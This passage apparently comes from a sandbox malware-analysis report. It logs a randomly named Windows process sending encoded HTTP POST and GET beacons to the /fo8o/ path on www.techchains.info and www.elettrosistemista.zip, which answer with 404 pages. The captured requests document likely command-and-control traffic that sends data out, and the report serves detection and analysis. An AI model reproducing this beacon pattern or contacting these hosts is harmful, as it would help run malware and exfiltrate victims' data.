                                                                                  Dec 7, 2024 07:02:45.221416950 CET | 1236 | IN | Data Raw: 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69
                                                                                  Data Ascii: n youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedopark
                                                                                  Dec 7, 2024 07:02:45.221430063 CET | 1236 | IN | Data Raw: 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a 2d 30 2e 35 65 6d 7d 61 75
                                                                                  Data Ascii: t:0;position:relative;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,text
                                                                                  Dec 7, 2024 07:02:45.221529007 CET | 1236 | IN | Data Raw: 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 3a 3a 2d 77 65 62 6b 69 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 62 75 74 74 6f 6e 7b
                                                                                  Data Ascii: ]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:no
                                                                                  Dec 7, 2024 07:02:45.221539974 CET | 1236 | IN | Data Raw: 6e 2d 68 65 69 67 68 74 3a 38 32 30 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 7b 70 61 64 64 69 6e 67 3a 30 20 30 20 31 2e 36 65 6d 20 30 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65
                                                                                  Data Ascii: n-height:820px}.two-tier-ads-list{padding:0 0 1.6em 0}.two-tier-ads-list__list-element{list-style:none;padding:10px 0 5px 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/bullet_
                                                                                  Dec 7, 2024 07:02:45.221553087 CET | 1236 | IN | Data Raw: 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 74 65 78 74 2d
                                                                                  Data Ascii: e-block__list-element-link:link,.webarchive-block__list-element-link:visited{text-decoration:none}.webarchive-block__list-element-link:hover,.webarchive-block__list-element-link:active,.webarchive-block__list-element-link:focus{text-decoration
                                                                                  Dec 7, 2024 07:02:45.221679926 CET | 776 | IN | Data Raw: 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72
                                                                                  Data Ascii: text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#555}.container-contact-us{text-align:center}.container-contact-us__content{display:inlin
                                                                                  Dec 7, 2024 07:02:45.221693039 CET | 1236 | IN | Data Raw: 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 6d 61 72 67 69 6e 3a 30 20 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70
                                                                                  Data Ascii: er-cookie-message__content-interactive{text-align:left;margin:0 15px;font-size:10px}.container-cookie-message__content-interactive-header,.container-cookie-message__content-interactive-text{color:#fff}.container-cookie-message__content-iC94
                                                                                  Dec 7, 2024 07:02:45.221705914 CET | 1236 | IN | Data Raw: 3a 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 20 32 35 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b
                                                                                  Data Ascii: :solid;border-radius:5px;padding:15px 25px;text-align:center;text-decoration:none;cursor:pointer;margin:5px;transition:.3s}.btn--success{background-color:#218838;border-color:#218838;color:#fff;font-size:x-large}.btn--success:hover{background-
                                                                                  Dec 7, 2024 07:02:45.221719027 CET | 994 | IN | Data Raw: 63 6f 6c 6f 72 3a 23 66 66 66 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 7d 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 2d 2d 72 6f 75 6e 64 7b 62 6f 72 64 65 72 2d 72 61 64
                                                                                  Data Ascii: color:#fff;-webkit-transition:.4s;transition:.4s}.switch__slider--round{border-radius:34px}.switch__slider--round:before{border-radius:50%}input:checked+.switch__slider{background-color:#007bff}input:focus+.switch__slider{box-shadow:0 0 1px #0
                                                                                  Dec 7, 2024 07:02:45.341567039 CET | 1236 | IN | Data Raw: 35 37 36 0d 0a 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41
                                                                                  Data Ascii: 576w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_RDWq73q0NrYpn1brzL4YsryGIhAvd0v7OU4mMCRVNwv8xMIKz4DzHGR61iHqOR0Hk5twVuhJ9rwhHfjfaIxREg==","tid":3049,"buybox":false,"buyboxTopic":true,"disclaimer":true,"imp


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  13 | 192.168.2.5 | 49988 | 66.29.149.46 | 80 | 4568 | C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 7, 2024 07:02:59.894686937 CET | 780 | OUT | POST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.techchains.info
                                                                                  Origin: http://www.techchains.info
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Referer: http://www.techchains.info/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 6b 30 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 64 72 2b 59 53 49 49 64 68 49 53 61 68 49 73 7a 47 4e 63 69 31 4e 6f 76 79 34 6b 6d 62 53 73 59 6e 36 30 39 74 77 3d
                                                                                  Data Ascii: k0=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXIdr+YSIIdhISahIszGNci1Novy4kmbSsYn609tw=
                                                                                  Dec 7, 2024 07:03:01.062185049 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Sat, 07 Dec 2024 06:03:00 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 493
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  14 | 192.168.2.5 | 49989 | 66.29.149.46 | 80 | 4568 | C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 7, 2024 07:03:02.594657898 CET | 800 | OUT | POST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.techchains.info
                                                                                  Origin: http://www.techchains.info
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Referer: http://www.techchains.info/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 6b 30 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 68 51 2f 68 77 54 33 72 7a 46 43 45 71 45 6a 36 6c 52 4e 63 71 31 55 39 69 56 32 62 32 58 2f 52 73 2b 46 6d 46 4e
                                                                                  Data Ascii: k0=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVhQ/hwT3rzFCEqEj6lRNcq1U9iV2b2X/Rs+FmFN
                                                                                  Dec 7, 2024 07:03:03.787285089 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Sat, 07 Dec 2024 06:03:03 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 493
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  15 | 192.168.2.5 | 49990 | 66.29.149.46 | 80 | 4568 | C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 7, 2024 07:03:05.255558968 CET | 1817 | OUT | POST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.techchains.info
                                                                                  Origin: http://www.techchains.info
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Referer: http://www.techchains.info/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 6b 30 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 63 57 44 32 67 46 78 31 5a 31 7a 56 4d 79 39 68 4d 2f 32 39 50 59 42 6b 57 65 67 36 34 30 57 38 32 68 53 35 62 52 2b 37 33 2f 70 31 59 78 46 53 30 52 52 4a 71 57 32 41 7a 76 70 6a 47 62 49 38 31 4c 70 36 56 6b 71 62 39 50 7a 33 70 72 75 61 75 50 52 51 6d 44 34 44 49 71 68 2b 41 4e 67 61 38 6b 31 58 38 6b 79 50 74 4d 6d 67 59 70 30 4f 63 45 34 33 4a 57 57 37 4e 71 4c 65 49 6f 76 41 4a 52 66 63 6e 2f 44 2b 4a 63 52 51 61 42 5a 72 68 6b 73 75 44 75 5a 71 6c 45 73 48 4a 2f 58 37 38 67 57 6f 4c [TRUNCATED]
                                                                                  Data Ascii: k0= [TRUNCATED]
                                                                                  Dec 7, 2024 07:03:06.501502991 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Sat, 07 Dec 2024 06:03:06 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 493
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  16 | 192.168.2.5 | 49991 | 66.29.149.46 | 80 | 4568 | C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 7, 2024 07:03:07.907162905 CET | 521 | OUT | GET /fo8o/?k0=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hboQSxRfFXXJhWlOcLO2B4JSrf1qenLAzZaPHfWrFdh0bEA==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.techchains.info
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Dec 7, 2024 07:03:09.133428097 CET | 652 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Sat, 07 Dec 2024 06:03:08 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 493
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  17 | 192.168.2.5 | 49992 | 195.110.124.133 | 80 | 4568 | C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 7, 2024 07:03:15.262001991 CET | 798 | OUT | POST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.elettrosistemista.zip
                                                                                  Origin: http://www.elettrosistemista.zip
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 6b 30 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 53 30 5a 7a 49 56 54 58 76 4b 5a 37 6d 56 63 63 63 59 53 44 52 4c 2b 39 4a 4d 44 5a 2f 48 79 67 4b 62 4b 62 65 45 3d
                                                                                  Data Ascii: k0=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCiS0ZzIVTXvKZ7mVcccYSDRL+9JMDZ/HygKbKbeE=
                                                                                  Dec 7, 2024 07:03:16.540817976 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Sat, 07 Dec 2024 06:03:16 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 203
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
